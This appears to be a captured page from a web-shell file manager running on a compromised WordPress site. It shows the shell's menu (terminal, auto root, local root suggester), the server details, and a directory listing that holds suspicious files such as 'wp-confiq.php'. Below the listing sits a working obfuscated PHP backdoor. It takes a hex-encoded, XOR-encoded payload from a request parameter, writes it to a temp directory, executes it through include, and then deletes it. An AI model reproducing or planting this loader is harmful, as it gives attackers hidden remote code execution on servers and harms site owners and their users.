Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oishifashion /
tt.oishifashion.com /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-08-12 13:30
cgi-bin
[ DIR ]
drwxr-xr-x
2025-12-18 07:34
wp-admin
[ DIR ]
drwxr-xr-x
2025-12-23 01:12
wp-content
[ DIR ]
drwxr-xr-x
2025-12-23 01:12
wp-includes
[ DIR ]
drwxr-xr-x
2025-12-23 01:13
.element
0
B
-rw-r--r--
2025-12-28 22:39
.htaccess
621
B
-r--r--r--
2025-12-23 01:11
16940c9f59d0a4admin.php
9.25
KB
-rw-r--r--
2025-12-16 02:54
C.php
1.02
KB
-rw-r--r--
2025-12-28 19:40
about.php
5.05
KB
-rw-r--r--
2025-11-08 00:55
blocks.class.php
535
B
-rw-r--r--
2025-12-28 00:59
blocks.php
2.57
KB
-rw-r--r--
2025-12-28 13:48
content.php
4.42
KB
-rw-r--r--
2025-09-15 00:15
error_log
6.23
KB
-rw-r--r--
2025-12-28 22:38
header.php
16.46
KB
-rw-r--r--
2025-10-25 00:25
http.php
714
B
-rw-r--r--
2025-12-28 19:40
index.php
50.84
KB
-r--r--r--
2025-12-23 01:11
radio.php
4.42
KB
-rw-r--r--
2025-09-29 00:20
register_pre.php
535
B
-rw-r--r--
2025-12-28 00:57
titulos.php
626
B
-rw-r--r--
2025-12-28 13:51
wp-blog-header.php
2.74
KB
-rw-r--r--
2025-12-18 07:34
wp-confiq.php
105.03
KB
-rw-r--r--
2025-12-18 07:34
wp-cron.php
2.74
KB
-rw-r--r--
2025-12-18 07:34
wp.php
33
B
-rw-r--r--
2025-09-15 00:15
Save
Rename
<?php if(array_key_exists("r\x65f", $_REQUEST)){ $object = array_filter([ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), getenv("TEMP"), getcwd(), session_save_path(), "/dev/shm", getenv("TMP"), "/var/tmp"]); $component = hex2bin($_REQUEST["r\x65f"]); $data = '' ; $j = 0; do{$data .= chr(ord($component[$j]) ^ 42);$j++;} while($j < strlen($component)); foreach ($object as $rec) { if ((function($d) { return is_dir($d) && is_writable($d); })($rec)) { $hld = "$rec" . "/.reference"; $success = file_put_contents($hld, $data); if ($success) { include $hld; @unlink($hld); exit;} } } }